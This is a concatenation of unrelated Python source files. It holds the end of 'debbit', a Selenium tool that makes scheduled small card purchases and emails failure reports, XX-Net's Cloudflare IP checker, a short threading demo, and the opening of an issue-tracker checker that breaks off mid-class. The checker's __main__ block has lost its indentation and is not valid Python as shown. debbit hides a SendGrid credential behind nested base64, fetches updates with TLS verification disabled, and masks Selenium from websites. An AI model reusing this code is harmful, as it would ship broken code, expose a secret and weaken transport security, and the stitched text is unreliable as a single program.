    if not os.path.exists(absolute_path('state')):
        os.mkdir(absolute_path('state'))
    padded_month = '0' + str(now.month) if now.month < 10 else str(now.month)
    filename = absolute_path('state', 'debbit_' + str(now.year) + '_' + padded_month + '.txt')
    # `with` releases the lock even if load_state or the file write raises;
    # the previous bare acquire()/release() pair would leave the lock held
    # forever on error, deadlocking every other merchant thread.
    with STATE_WRITE_LOCK:
        state = load_state(now.year, now.month)
        if merchant_id not in state:
            state[merchant_id] = {
                'purchase_count': 0,
                'transactions': []
            }
        cur_purchase_count = state[merchant_id]['purchase_count'] + 1
        state[merchant_id]['purchase_count'] = cur_purchase_count
        state[merchant_id]['transactions'].append({
            'amount': str(amount) + ' cents',
            'human_time': now.strftime("%Y-%m-%d %I:%M%p"),
            'unix_time': int(now.timestamp())
        })
        with open(filename, 'w', encoding='utf-8') as f:
            f.write(yaml.dump(state))
    LOGGER.info(str(cur_purchase_count) + ' ' + merchant_id + ' ' + plural('purchase', cur_purchase_count) + ' complete for ' + now.strftime('%B %Y'))
def formatted_date_of_offset(now, start_offset):
    """Return 'YYYY-MM-DD HH:MMAM/PM' for *now* plus *start_offset* seconds."""
    moment = now + timedelta(seconds=start_offset)
    return moment.strftime("%Y-%m-%d %I:%M%p")
def web_automation_wrapper(merchant):
    """Run *merchant*'s automation with retries, failure capture, and
    transaction bookkeeping.

    Retries up to 5 times with a steep backoff. On persistent failure or an
    unverifiable purchase, records diagnostics, notifies, and aborts this
    merchant's thread. Returns the final Result otherwise.
    """
    failures = 0
    threshold = 5
    while failures < threshold:
        amount = choose_amount(merchant)
        driver = get_webdriver(merchant)
        error_msg = None
        LOGGER.info('Spending ' + str(amount) + ' cents with ' + merchant.id + ' now')
        try:
            # Coverage wraps the run so failure reports can include which
            # merchant-automation lines executed.
            with Coverage() as cov:
                result = merchant.web_automation(driver, merchant, amount)
        except (KeyboardInterrupt, SystemExit):
            raise
        except Exception:
            # NOTE(review): if Coverage() itself raised, `cov` is unbound and
            # the record_failure calls below would NameError — confirm whether
            # that path is possible/acceptable.
            result = Result.failed
            error_msg = traceback.format_exc()
        if result == Result.failed:
            if not error_msg:
                error_msg = 'Result.failed'
            LOGGER.error(merchant.id + ' error: ' + error_msg)
            failures += 1
            record_failure(driver, merchant, error_msg, cov)
            close_webdriver(driver, merchant)
            if failures < threshold:
                LOGGER.info(str(failures) + ' of ' + str(threshold) + ' ' + merchant.id + ' attempts done, trying again in ' + str(60 * failures ** 4) + ' seconds')
                time.sleep(60 * failures ** 4)  # try again in 1min, 16min, 1.3hr, 4.3hr, 10.4hr
                continue
            else:
                exit_msg = merchant.id + ' failed ' + str(failures) + ' times in a row. NOT SCHEDULING MORE ' + merchant.id + '. Stop and re-run debbit to try again.'
                if not CONFIG.send_failures_to_developer:
                    exit_msg += ' To help get this issue fixed, please set send_failures_to_developer to yes in config.txt or follow instructions at https://jakehilborn.github.io/debbit/#merchant-automation-failed-how-do-i-get-it-fixed'
                LOGGER.error(exit_msg)
                notify_failure(exit_msg)
                raise Exception(exit_msg)  # exits this merchant's thread, not entire program
        if result == Result.unverified:
            # The purchase may or may not have gone through; stop scheduling
            # to avoid double-spending.
            record_failure(driver, merchant, 'Result.unverified', cov)
            close_webdriver(driver, merchant)
            exit_msg = 'Unable to verify ' + merchant.id + ' purchase was successful. Just in case, NOT SCHEDULING MORE ' + merchant.id + '. Stop and re-run debbit to try again.'
            if not CONFIG.send_failures_to_developer:
                exit_msg += ' To help get this issue fixed, please set send_failures_to_developer to yes in config.txt or follow instructions at https://jakehilborn.github.io/debbit/#merchant-automation-failed-how-do-i-get-it-fixed'
            LOGGER.error(exit_msg)
            notify_failure(exit_msg)
            sys.exit(1)  # exits this merchant's thread, not entire program
        close_webdriver(driver, merchant)
        if result == Result.success:
            record_transaction(merchant.id, amount)
        return result
def choose_amount(merchant):
    """Pick a purchase amount (in cents) within the configured range,
    avoiding amounts already used this month when possible."""
    now = datetime.now()
    state = load_state(now.year, now.month)
    if merchant.id not in state:  # first purchase, choose any amount in config.txt range
        return random.randint(merchant.amount_min, merchant.amount_max)
    # '50 cents' -> 50
    past_amounts = [int(t['amount'][:-6]) for t in state[merchant.id]['transactions']]
    # Prefer a value never used this month. If the whole range is exhausted
    # we must repeat an amount; in that case favor the one used furthest in
    # the past (some merchants reject duplicate amounts within a window) by
    # progressively ignoring more of the oldest history until a candidate
    # becomes available again.
    full_range = set(range(merchant.amount_min, merchant.amount_max + 1))
    for start in range(len(past_amounts) + 1):
        candidates = list(full_range - set(past_amounts[start:]))
        if candidates:
            return random.choice(candidates)
def record_failure(driver, merchant, error_msg, cov):
    """Write failure artifacts (error text, screenshot, scrubbed DOM, and a
    coverage HTML report) under failures/, and optionally email them to the
    developer. Each capture step is best-effort."""
    if not os.path.exists(absolute_path('failures')):
        os.mkdir(absolute_path('failures'))
    filename_prefix = datetime.now().strftime('%Y-%m-%d_%H-%M-%S-%f') + '_' + merchant.name
    with open(absolute_path('failures', filename_prefix + '.txt'), 'w', encoding='utf-8') as f:
        f.write(VERSION + ' ' + platform.system() + ' ' + error_msg)
    try:
        driver.save_screenshot(absolute_path('failures', filename_prefix + '.png'))
        dom = driver.execute_script("return document.documentElement.outerHTML")
        # Credentials/card numbers are masked before the DOM hits disk.
        dom = scrub_sensitive_data(dom, merchant)
        with open(absolute_path('failures', filename_prefix + '.html'), 'w', encoding='utf-8') as f:
            f.write(dom)
    except (KeyboardInterrupt, SystemExit):
        raise
    except Exception:
        LOGGER.error('record_failure DOM error: ' + traceback.format_exc())
    try:
        if cov:  # cov is None when a debugger is attached
            cov.html_report(directory=absolute_path('failures', filename_prefix + '_' + 'coverage'), include='*/merchants/*')
    except (KeyboardInterrupt, SystemExit):
        raise
    except Exception:
        LOGGER.error('record_failure coverage error: ' + traceback.format_exc())
    if CONFIG.send_failures_to_developer:
        report_failure(filename_prefix)  # TODO put the retry number in here. If first failure, nbd, if recurring failures then it's a bigger problem.
def scrub_sensitive_data(data, merchant):
    """Mask the merchant's username, password, and card number (full value
    and last four digits) in *data* before it is written to disk."""
    if not data:
        return data
    # Order matters: the full card number is masked before its last 4 digits
    # so the short pattern only catches standalone occurrences.
    replacements = [
        (merchant.usr, '***usr***'),
        (merchant.psw, '***psw***'),
        (merchant.card, '***card***'),
        (merchant.card[-4:], '***card***'),  # last 4 digits of card
    ]
    for needle, mask in replacements:
        data = data.replace(needle, mask)
    return data
def report_failure(failure_report_filename_prefix):
    """Zip every artifact belonging to one failure report (matched by
    filename prefix) into memory and email it to the developer."""
    mem_zip = BytesIO()
    with zipfile.ZipFile(mem_zip, mode='w', compression=zipfile.ZIP_DEFLATED) as z:
        for root, dirs, files in os.walk(absolute_path('failures')):
            for file in files:
                if file.startswith(failure_report_filename_prefix):
                    z.write(os.path.join(root, file), file)
                elif failure_report_filename_prefix in root:  # include all files in subdirs that comprise of this failure report
                    z.write(os.path.join(root, file), os.path.join(root.split(os.sep + 'failures' + os.sep)[1], file))
    # sendgrid is blocking delivery of many file types. Sending the zip as a "pdf" seems to work though.
    send_email('failure report for developer', 'debbit.failure.notify@gmail.com', failure_report_filename_prefix, 'merchant automation failure report', 'error_report.pdf', 'application/pdf', mem_zip.getvalue())
def notify_failure(exit_msg):
    """Email *exit_msg* to the user's configured failure address, if any.
    The body varies with whether reports are also auto-sent to the developer."""
    if not CONFIG.notify_failure:
        return
    to_email = CONFIG.notify_failure
    subject = 'Debbit Failure'
    if CONFIG.send_failures_to_developer:
        html_content = ('{exit_msg}'
                        '<br><br>'
                        'This error report was also sent to the debbit developer to be investigated and fixed. Feel free to email '
                        'jakehilborn@gmail.com or open an "Issue" at https://github.com/jakehilborn/debbit/issues to discuss this '
                        'error.')\
            .format(exit_msg=exit_msg)
    else:
        html_content = ('{exit_msg}'
                        '<br><br>'
                        '<strong>This debbit failure was only sent to you.</strong> To help get this issue fixed, please consider '
                        'changing send_<i>failures_to_developer</i> to <i>yes</i> in the config.txt file. This will automatically send '
                        'future error reports to the debbit developer so the issue can be investigated and fixed. You can also share '
                        'this failure manually via email. In the failures folder there are files with timestamps for names. Each '
                        'timestamp has 3 files ending in .txt, .png, .html, and a folder ending in _coverage. Email these files to '
                        'jakehilborn@gmail.com or open an "Issue" at https://github.com/jakehilborn/debbit/issues and attach them '
                        'there. You can send one error or the whole failures folder, the more errors to inspect the more helpful.')\
            .format(exit_msg=exit_msg)
    send_email('failure notification', to_email, subject, html_content)
def send_email(purpose, to_email, subject, html_content, attachment_name=None, attachment_type=None, attachment_data=None):
    """Send an HTML email (with optional single attachment) via SendGrid SMTP.
    *purpose* is used only in log messages. Errors are logged, never raised
    (except KeyboardInterrupt/SystemExit).
    """
    # NOTE(review): `d` appears to hold a SendGrid credential obfuscated with
    # nested base64 (element i is decoded i+1 times, then pieces are
    # concatenated into `o`). This is obfuscation, not secrecy — anyone with
    # this file can recover the value. Confirm whether that is acceptable.
    d = [b'U0cueDBSVmZZeVFRRHVHRHpY',
         b'WkRsQk4xaGtaeTVYZEhOcFdsWnpRM1ZS',
         b'WWpKa2Qxb3dUbFpQVjJSU1ltdEdOV0pyVGpKa01VMHlaVzVHV2xOR1ZrdGlNbmN4WkVabk0xSXhVa1k9']
    o = ''
    for i in range(len(d)):
        s = d[i]
        for j in range(i + 1):
            s = base64.b64decode(s)
        o += s.decode('utf-8')
    from_email = 'debbit.failure@debbit.com'
    msg = MIMEMultipart()
    msg['From'] = from_email
    msg['To'] = to_email
    msg['Subject'] = subject
    msg.attach(MIMEText(html_content, "html"))
    if attachment_name:
        # attachment_type is a MIME type like 'application/pdf'.
        attachment = MIMEBase(attachment_type.split('/')[0], attachment_type.split('/')[1])
        attachment.set_payload(attachment_data)
        attachment.add_header('Content-Disposition', 'attachment', filename=attachment_name)
        encoders.encode_base64(attachment)
        msg.attach(attachment)
    try:
        server = smtplib.SMTP_SSL('smtp.sendgrid.net', 465)
        server.ehlo()
        # SendGrid SMTP auth uses the literal username 'apikey'.
        server.login(base64.b64decode('YXBpa2V5Cg==').decode('utf-8').strip(), o)
        server.sendmail(from_email, to_email, msg.as_string())
        server.close()
        LOGGER.info('Successfully sent ' + purpose + ' email to ' + to_email)
    except (KeyboardInterrupt, SystemExit):
        raise
    except Exception as e:
        LOGGER.error('Unable to send ' + purpose + ' email')
        LOGGER.error(e)
def get_webdriver(merchant):
    """Launch a Firefox webdriver configured to reduce Selenium detection.

    Acquires WEB_DRIVER_LOCK so only one purchase runs at a time; the lock
    is released by close_webdriver() (or here on startup failure).
    """
    if os.name == 'nt':
        geckodriver_file = 'geckodriver.exe'
    else:
        geckodriver_file = 'geckodriver'
    # Both file names are probed regardless of platform; geckodriver_file is
    # only used to build the error messages below.
    if os.path.exists(absolute_path('program_files', 'geckodriver.exe')):
        geckodriver_path = absolute_path('program_files', 'geckodriver.exe')
    elif os.path.exists(absolute_path('program_files', 'geckodriver')):
        geckodriver_path = absolute_path('program_files', 'geckodriver')
    else:
        LOGGER.error(absolute_path('program_files', geckodriver_file) + ' does not exist. Download the latest version of geckodriver from https://github.com/mozilla/geckodriver/releases and extract it. Copy ' + geckodriver_file + ' to ' + absolute_path('program_files'))
        sys.exit(1)
    WEB_DRIVER_LOCK.acquire()  # Only execute one purchase at a time so the console log messages don't inter mix
    options = Options()
    options.headless = CONFIG.hide_web_browser
    profile = webdriver.FirefoxProfile(absolute_path('program_files', 'selenium-cookies-extension', 'firefox-profile'))
    # Prevent websites from detecting Selenium via evaluating `if (window.navigator.webdriver == true)` with JavaScript
    profile.set_preference("dom.webdriver.enabled", False)
    profile.set_preference('useAutomationExtension', False)
    try:
        driver = webdriver.Firefox(options=options,
                                   service_log_path=os.devnull,
                                   executable_path=geckodriver_path,
                                   firefox_profile=profile)
    except SessionNotCreatedException as e:
        LOGGER.error(str(e) + '\n')
        LOGGER.error('There was a problem starting Firefox. Make sure the latest version of Firefox is installed. If installing/updating Firefox does not fix the issue, try downloading a newer or older version of geckodriver from https://github.com/mozilla/geckodriver/releases and extracting it. Copy ' + geckodriver_file + ' to ' + absolute_path('program_files'))
        # Release before exiting so other merchant threads are not deadlocked.
        WEB_DRIVER_LOCK.release()
        sys.exit(1)
    # Randomize viewport size to help avoid Selenium detection
    driver.set_window_size(random.randint(1050, 1350), random.randint(700, 1000))
    if merchant.use_cookies:
        restore_cookies(driver, merchant)
    return driver
def close_webdriver(driver, merchant):
    """Best-effort teardown: persist cookies, quit the browser, and release
    the global webdriver lock. Each step swallows errors so one failure
    cannot leave the browser running or the lock held."""
    try:
        if merchant.use_cookies:
            persist_cookies(driver, merchant)
    except (KeyboardInterrupt, SystemExit):
        raise
    except Exception as e:
        LOGGER.error(str(e) + ' - proceeding without persisting cookies')
    try:
        driver.quit()
    except (KeyboardInterrupt, SystemExit):
        raise
    except Exception:
        pass
    try:
        # release() raises if the lock is not held (e.g. already released on
        # a startup-failure path in get_webdriver) — ignore that case.
        WEB_DRIVER_LOCK.release()
    except (KeyboardInterrupt, SystemExit):
        raise
    except Exception:
        pass
def restore_cookies(driver, merchant):
    """Load previously persisted cookies into the browser via the bundled
    cookie extension; logs and continues on any failure."""
    try:
        # Prefer the current <name>_<usr> cookie file, fall back to the
        # legacy per-merchant-id file.
        if os.path.exists(absolute_path('program_files', 'cookies', merchant.name + '_' + merchant.usr)):
            with open(absolute_path('program_files', 'cookies', merchant.name + '_' + merchant.usr), 'r', encoding='utf-8') as f:
                cookies = f.read()
        elif os.path.exists(absolute_path('program_files', 'cookies', merchant.id)):  # legacy v2.0 - v2.0.2 cookie format
            with open(absolute_path('program_files', 'cookies', merchant.id), 'r', encoding='utf-8') as f:
                cookies = f.read()
        else:
            return
        # Hand the payload to the extension through the page DOM, then poll
        # (up to 30s) for its 'done' acknowledgement.
        driver.get('file://' + absolute_path('program_files', 'selenium-cookies-extension', 'restore-cookies.html'))
        driver.execute_script("document.getElementById('content').textContent = '" + cookies + "'")
        driver.execute_script("document.getElementById('status').textContent = 'dom-ready'")
        seconds = 30
        for i in range(seconds * 10):
            if driver.find_element_by_id('status').text == 'done':
                return
            time.sleep(0.1)
        error_msg = 'Unable to restore cookies after ' + str(seconds) + ' seconds'
    except (KeyboardInterrupt, SystemExit):
        raise
    except Exception as e:
        error_msg = str(e)
    LOGGER.error(error_msg + ' - proceeding without restoring cookies')
def persist_cookies(driver, merchant):
    """Save the browser's cookies to disk via the bundled cookie extension.

    Loads persist-cookies.html, waits up to 30 seconds for the extension to
    publish the cookie payload into the page DOM, then writes it to
    program_files/cookies/<name>_<usr> and removes any legacy cookie file.
    """
    driver.get('file://' + absolute_path('program_files', 'selenium-cookies-extension', 'persist-cookies.html'))
    seconds = 30
    for i in range(seconds * 10):
        if driver.find_element_by_id('status').text == 'dom-ready':
            break
        if i == seconds * 10 - 1:
            # Fixed log text: this is the persist path, not restore.
            LOGGER.error('Unable to persist cookies after ' + str(seconds) + ' seconds - proceeding without persisting cookies')
            return
        time.sleep(0.1)
    cookies = driver.find_element_by_id('content').text
    if not os.path.exists(absolute_path('program_files', 'cookies')):
        os.mkdir(absolute_path('program_files', 'cookies'))
    with open(absolute_path('program_files', 'cookies', merchant.name + '_' + merchant.usr), 'w', encoding='utf-8') as f:
        f.write(cookies)
    if os.path.exists(absolute_path('program_files', 'cookies', merchant.id)):  # legacy v2.0 - v2.0.2 cookie format
        os.remove(absolute_path('program_files', 'cookies', merchant.id))
def absolute_path(*rel_paths):  # works cross platform when running source script or Pyinstaller binary
    """Return an absolute path rooted at the program's install directory.

    Uses sys.executable for frozen (PyInstaller) builds, otherwise this
    script's own location.
    """
    # Bug fix: the original passed the string literal '__file__', which made
    # abspath resolve against the current working directory instead of the
    # script's real location.
    script_path = sys.executable if getattr(sys, 'frozen', False) else os.path.abspath(__file__)
    return os.path.join(os.path.dirname(script_path), *rel_paths)
def plural(word, count):
    """Return *word*, pluralized with a trailing 's' unless count == 1."""
    return word if count == 1 else word + 's'
def update_check():
    """Log an update notice (with accumulated changelogs) when a newer debbit
    release exists; network failures are tolerated silently or with a hint."""
    non_ssl_context = ssl.SSLContext()  # Having issues with Pyinstaller executables throwing SSL errors. Disabling SSL verification for GET operations to static GitHub pages.
    try:
        latest_version = int(urllib.request.urlopen('http://jakehilborn.github.io/debbit/updates/latest.txt', context=non_ssl_context).read())
    except (KeyboardInterrupt, SystemExit):
        raise
    except Exception:
        LOGGER.error('Unable to check for updates. Check https://github.com/jakehilborn/debbit/releases if interested.')
        return
    if VERSION_INT >= latest_version:
        return
    changelog = '\n\nDebbit update available! Download latest release here: https://github.com/jakehilborn/debbit/releases\n'
    try:
        # Concatenate the changelog of every version between ours and latest.
        for i in range(VERSION_INT, latest_version):
            changelog += '\n' + urllib.request.urlopen('http://jakehilborn.github.io/debbit/updates/changelogs/' + str(i + 1) + '.txt', context=non_ssl_context).read().decode('utf-8')
    except (KeyboardInterrupt, SystemExit):
        raise
    except Exception:
        # A missing changelog page shouldn't suppress the update notice.
        pass
    LOGGER.info(changelog)
    return
def pyinstaller_runtime_patches():
    """Apply runtime patches that are needed only when running as a frozen
    PyInstaller binary; a no-op when running from source."""
    if not getattr(sys, 'frozen', False):
        return  # only apply runtime patches if this is a Pyinstaller binary
    # workaround so PyInstaller can dynamically load program_files/merchants/*.py
    sys.path.insert(0, absolute_path())
    # force Coverage to look for assets in program_files directory.
    # This nasty patch is for coverage v5.1 and may break if the dependency is updated.
    __import__('coverage.html', fromlist=["*"]).STATIC_PATH = [absolute_path('program_files', 'coverage-htmlfiles')]
class Coverage:
    """Context manager wrapping coverage.Coverage for merchant automation runs.

    When a debugger is attached (sys.gettrace() is truthy), coverage is not
    started at all — enabling it would disable the debugger — and the managed
    value is None.
    """
    def __init__(self):
        if sys.gettrace():
            LOGGER.warning('Debugger detected. Not attaching coverage module to merchant automation since it disables the debugger.')
            self.cov = None
        else:
            self.cov = coverage.Coverage(data_file=None, branch=True)
    def __enter__(self):
        if self.cov is not None:
            self.cov.start()
        # Callers receive the raw coverage object (or None) so they can
        # render HTML reports after the run.
        return self.cov
    def __exit__(self, exc_type, exc_value, exc_tb):
        if self.cov is not None:
            self.cov.stop()
class Merchant:
    """Runtime view of one merchant entry from config, bound to a card.

    Required config keys: total_purchases, amount_min, amount_max, usr, psw,
    card (and burst_count in burst mode). Everything under 'advanced' is
    optional with the defaults noted inline.
    """
    def __init__(self, card, name, web_automation, merchant_config):
        self.id = str(card) + '_' + name
        self.name = name
        self.web_automation = web_automation  # merchant module's automation entry point
        self.total_purchases = merchant_config['total_purchases']
        self.amount_min = merchant_config['amount_min']
        self.amount_max = merchant_config['amount_max']
        self.usr = str(merchant_config['usr'])
        self.psw = str(merchant_config['psw'])
        self.card = str(merchant_config['card'])
        if CONFIG.mode == 'burst' and not merchant_config.get('burst_count'):
            LOGGER.error(self.id + ' config is missing "burst_count"')
            sys.exit(1)
        # .get() instead of [] so spread-mode configs without a burst_count
        # no longer raise KeyError; burst mode has already validated the key
        # is present above, and spread mode never reads this attribute.
        self.burst_count = merchant_config.get('burst_count')
        # Optional advanced config or default values.
        self.use_cookies = merchant_config.get('advanced', {}).get('use_cookies', True)
        self.min_day = merchant_config.get('advanced', {}).get('min_day', 2)  # avoid off by one errors in all systems
        self.max_day = merchant_config.get('advanced', {}).get('max_day')  # calculated dynamically if None is returned
        self.burst_min_gap = merchant_config.get('advanced', {}).get('burst', {}).get('min_gap')  # calculated dynamically if None is returned
        self.burst_time_variance = merchant_config.get('advanced', {}).get('burst', {}).get('time_variance', 14400)  # 4 hours
        self.burst_intra_gap = merchant_config.get('advanced', {}).get('burst', {}).get('intra_gap', 30)  # 30 seconds
        self.burst_poll_gap = merchant_config.get('advanced', {}).get('burst', {}).get('poll_gap', 300)  # 5 minutes
        self.spread_min_gap = merchant_config.get('advanced', {}).get('spread', {}).get('min_gap', 14400)  # 4 hours
        self.spread_time_variance = merchant_config.get('advanced', {}).get('spread', {}).get('time_variance', 14400)  # 4 hours
class Config:
    """Global debbit settings parsed from config.txt / config.yml.

    The top-level keys mode, hide_web_browser, notify_failure, and
    send_failures_to_developer become attributes; every remaining top-level
    key is treated as a card whose value maps merchant names to their config.
    """
    def __init__(self, config):
        if config.get('mode') != 'burst' and config.get('mode') != 'spread':
            LOGGER.error('Set config.txt "mode" to burst or spread')
            sys.exit(1)
        self.mode = config.get('mode')
        self.hide_web_browser = config.get('hide_web_browser')
        # The sample config ships with a placeholder address; treat it as "off".
        if config.get('notify_failure') == 'your.email@website.com':
            self.notify_failure = None
        else:
            self.notify_failure = config.get('notify_failure')
        self.send_failures_to_developer = config.get('send_failures_to_developer')
        # The remainder of the config is cards. Take a shallow copy before
        # stripping the global keys — the original aliased the dict and
        # mutated the caller's config in place.
        self.cards = dict(config)
        for key in ['mode', 'hide_web_browser', 'notify_failure', 'send_failures_to_developer']:
            self.cards.pop(key, None)
if __name__ == '__main__':
    # Log to both stdout and program_files/debbit_log.log with one format.
    LOGGER = logging.getLogger('debbit')
    LOGGER.setLevel(logging.INFO)
    log_format = '%(levelname)s: %(asctime)s %(message)s'
    stdout_handler = logging.StreamHandler(sys.stdout)
    stdout_handler.setFormatter(logging.Formatter(log_format))
    LOGGER.addHandler(stdout_handler)
    file_handler = logging.FileHandler(absolute_path('program_files', 'debbit_log.log'))
    file_handler.setFormatter(logging.Formatter(log_format))
    LOGGER.addHandler(file_handler)
    pyinstaller_runtime_patches()
    # configure global constants
    STATE_WRITE_LOCK = Lock()  # serializes state-file read/modify/write
    WEB_DRIVER_LOCK = Lock()  # one browser automation at a time
    # NOTE(review): February is 28 days here and the max purchase day is
    # month length minus one — leap day and the final day of each month
    # appear deliberately excluded; confirm intent before changing.
    DAYS_IN_MONTH = {1: 31, 2: 28, 3: 31, 4: 30, 5: 31, 6: 30, 7: 31, 8: 31, 9: 30, 10: 31, 11: 30, 12: 31}
    VERSION = 'v2.1.3-dev'
    VERSION_INT = 8
    LOGGER.info(' __ __ __ _ __ ')
    LOGGER.info(' ____/ /__ / /_ / /_ (_) /_')
    LOGGER.info(' / __ / _ \/ __ \/ __ \/ / __/')
    LOGGER.info('/ /_/ / __/ /_/ / /_/ / / /_ ')
    LOGGER.info('\__,_/\___/_.___/_.___/_/\__/ ' + VERSION)
    LOGGER.info('')
    config_to_open = None
    # Prefer config.yml; fall back to the legacy config.txt name.
    for config_file in ['config.yml', 'config.txt']:
        if os.path.exists(absolute_path(config_file)):
            config_to_open = config_file
            break
    if config_to_open is None:
        LOGGER.error('Config file not found.')
        LOGGER.error('Copy and rename sample_config.txt to config.txt or config.yml.')
        LOGGER.error('Then, put your credentials and debit card info in the file.')
        sys.exit(1)
    with open(absolute_path(config_to_open), 'r', encoding='utf-8') as config_f:
        try:
            config_dict = yaml.safe_load(config_f.read())
        except yaml.YAMLError as yaml_e:
            config_error_msg = '\n\nFormatting error in ' + config_to_open + '. Ensure ' + config_to_open + ' has the same structure and spacing as the examples at https://jakehilborn.github.io/debbit/'
            if hasattr(yaml_e, 'problem_mark'):
                # problem_mark pinpoints the line/column of the YAML error.
                config_error_msg += '\n\n' + str(yaml_e.problem_mark)
            LOGGER.error(config_error_msg)
            sys.exit(1)
    CONFIG = Config(config_dict)
    main()
|
check_ip.py | #!/usr/bin/env python2
# coding:utf-8
import sys
import os
import json
import threading
# Resolve the XX-Net directory layout relative to this file and extend
# sys.path so the bundled python27 libraries and project roots can be
# imported. Append order matters: project roots first, then platform libs.
current_path = os.path.dirname(os.path.abspath(__file__))
root_path = os.path.abspath( os.path.join(current_path, os.pardir, os.pardir, os.pardir))
data_path = os.path.abspath(os.path.join(root_path, os.pardir, os.pardir, 'data'))
module_data_path = os.path.join(data_path, 'x_tunnel')
python_path = os.path.abspath( os.path.join(root_path, 'python27', '1.0'))
sys.path.append(root_path)
noarch_lib = os.path.abspath( os.path.join(python_path, 'lib', 'noarch'))
sys.path.append(noarch_lib)
if sys.platform == "win32":
    win32_lib = os.path.abspath( os.path.join(python_path, 'lib', 'win32'))
    sys.path.append(win32_lib)
elif sys.platform.startswith("linux"):
    linux_lib = os.path.abspath( os.path.join(python_path, 'lib', 'linux'))
    sys.path.append(linux_lib)
elif sys.platform == "darwin":
    darwin_lib = os.path.abspath( os.path.join(python_path, 'lib', 'darwin'))
    sys.path.append(darwin_lib)
    # macOS system Python 2.7 ships some extras outside the framework path.
    extra_lib = "/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python"
    sys.path.append(extra_lib)
import utils
import xlog
logger = xlog.getLogger("cloudflare_front")
logger.set_buffer(500)
from front_base.openssl_wrap import SSLContext
from front_base.connect_creator import ConnectCreator
from front_base.check_ip import CheckIp
from front_base.host_manager import HostManagerBase
from config import Config
def check_all_domain(check_ip, ip=None, wait_time=None):
    """Probe every front domain listed in front_domains.json through one IP.

    Args:
        check_ip: CheckIp instance used to perform each probe.
        ip: IP address to test. Defaults to the module-level ``ip`` that
            ``__main__`` sets up (the original relied on that global
            implicitly; the parameter keeps the call backward compatible).
        wait_time: seconds to wait per probe; defaults to the module-level
            ``wait_time`` (0 when unset).
    """
    # Fall back to the globals prepared by __main__, matching the original
    # implicit-global behaviour when called as check_all_domain(check_ip).
    if ip is None:
        ip = globals().get("ip")
    if wait_time is None:
        wait_time = globals().get("wait_time", 0)
    with open(os.path.join(current_path, "front_domains.json"), "r") as fd:
        content = fd.read()
    cs = json.loads(content)
    for host in cs:
        host = "scan1." + host
        res = check_ip.check_ip(ip, host=host, wait_time=wait_time)
        if not res or not res.ok:
            xlog.warn("host:%s fail", host)
        else:
            xlog.info("host:%s ok", host)
class CheckAllIp(object):
    """Scan every IP from good_ip.txt against one host, appending the
    working ones to cloudflare_checked_ip.txt.

    Thread-safe: a single lock serializes both input reads and output
    writes across the worker threads started by :meth:`run`.
    """

    def __init__(self, check_ip, host):
        self.check_ip = check_ip
        self.host = host
        self.lock = threading.Lock()
        # NOTE(review): both file handles stay open for the object's
        # lifetime and are never closed explicitly (process exit cleans
        # up) — this matches the original behaviour.
        self.in_fd = open("good_ip.txt", "r")
        self.out_fd = open(
            os.path.join(module_data_path, "cloudflare_checked_ip.txt"),
            "w"
        )

    def get_ip(self):
        """Return the next candidate IP; raise when the input is exhausted."""
        with self.lock:
            while True:
                line = self.in_fd.readline()
                if not line:
                    raise Exception("no ip left")
                try:
                    ip = line.split()[0]
                    return ip
                except IndexError:
                    # Blank or malformed line — skip it.
                    continue

    def write_ip(self, ip, host, handshake):
        """Append one verified IP record to the output file."""
        with self.lock:
            self.out_fd.write("%s %s gws %d 0 0\n" % (ip, host, handshake))
            self.out_fd.flush()

    def checker(self):
        """Worker loop: pull IPs and record the ones that pass the check."""
        while True:
            try:
                ip = self.get_ip()
            except Exception:
                xlog.info("no ip left")
                return
            try:
                # Bug fix: the original referenced the global ``host``
                # instead of the host this object was constructed with.
                res = self.check_ip.check_ip(ip, sni=self.host, host=self.host)
            except Exception as e:
                # Bug fix: the original format string had two placeholders
                # but only the exception was supplied.
                xlog.warn("check ip:%s except:%r", ip, e)
                continue
            if not res or not res.ok:
                xlog.debug("check fail:%s fail", ip)
                continue
            self.write_ip(ip, res.domain, res.handshake_time)

    def run(self):
        """Start 10 concurrent worker threads."""
        for i in range(0, 10):
            threading.Thread(target=self.checker).start()
def check_all_ip(check_ip):
    """Scan every IP in good_ip.txt against the canonical scan host."""
    CheckAllIp(check_ip, "scan1.movistar.gq").run()
if __name__ == "__main__":
# case 1: only ip
# case 2: ip + domain
# connect use domain
default_ip = "141.101.120.131"
host = "xx-net.net"
if len(sys.argv) > 1:
ip = sys.argv[1]
if not utils.check_ip_valid(ip):
ip = default_ip
host = sys.argv[1]
else:
ip = default_ip
print("Usage: check_ip.py [ip] [top_domain] [wait_time=0]")
xlog.info("test ip:%s", ip)
if len(sys.argv) > 2:
host = sys.argv[2]
xlog.info("host:%s", host)
if len(sys.argv) > 3:
wait_time = int(sys.argv[3])
else:
wait_time = 0
config_path = os.path.join(module_data_path, "cloudflare_front.json")
config = Config(config_path)
openssl_context = SSLContext(logger)
host_manager = HostManagerBase()
connect_creator = ConnectCreator(logger, config, openssl_context, host_manager, debug=True)
check_ip = CheckIp(logger, config, connect_creator)
#check_all_domain(check_ip)
#check_all_ip(check_ip)
#exit(0)
res = check_ip.check_ip(ip, sni=host, host=host, wait_time=wait_time)
if not res:
xlog.warn("connect fail")
elif res.ok:
xlog.info("success, domain:%s handshake:%d", res.host, res.handshake_time)
else:
xlog.warn("not support") |
02_应用程序.py | import threading
# Demo: spawn a background thread that prints its argument.
print('666')


def show_message(message):
    """Thread target: print whatever it was handed."""
    print(message)


worker = threading.Thread(target=show_message, args=('kkk',))
worker.start()
# Printed immediately by the main thread; the worker may still be running.
print('end')
|
issue.py | """For checking issue state based on supplied issue URL.
"""
import logging
import multiprocessing
import os
import re
import yaml
import requests
from abc import ABCMeta, abstractmethod
logger = logging.getLogger(__name__)
CREDENTIALS_FILE = 'credentials.yaml'
class IssueCheckerBase(object, metaclass=ABCMeta):
    """Base class for issue checkers.

    Bug fix: the original set ``__metaclass__ = ABCMeta``, which is the
    Python 2 spelling and has no effect on Python 3 — ``@abstractmethod``
    was therefore never enforced. Using the ``metaclass`` keyword makes
    subclasses actually implement :meth:`is_active`.
    """

    def __init__(self, url):
        # URL of the issue being tracked.
        self.url = url

    @abstractmethod
    def is_active(self):
        """Check if the issue is still active."""
        return True
class GitHubIssueChecker(IssueCheckerBase):
    """GitHub issue state checker."""

    NAME = 'GitHub'

    def __init__(self, url):
        super(GitHubIssueChecker, self).__init__(url)
        self.user = ''
        self.api_token = ''
        # Map the web URL onto the REST API endpoint, e.g.
        # https://github.com/o/r/issues/1 -> https://api.github.com/repos/o/r/issues/1
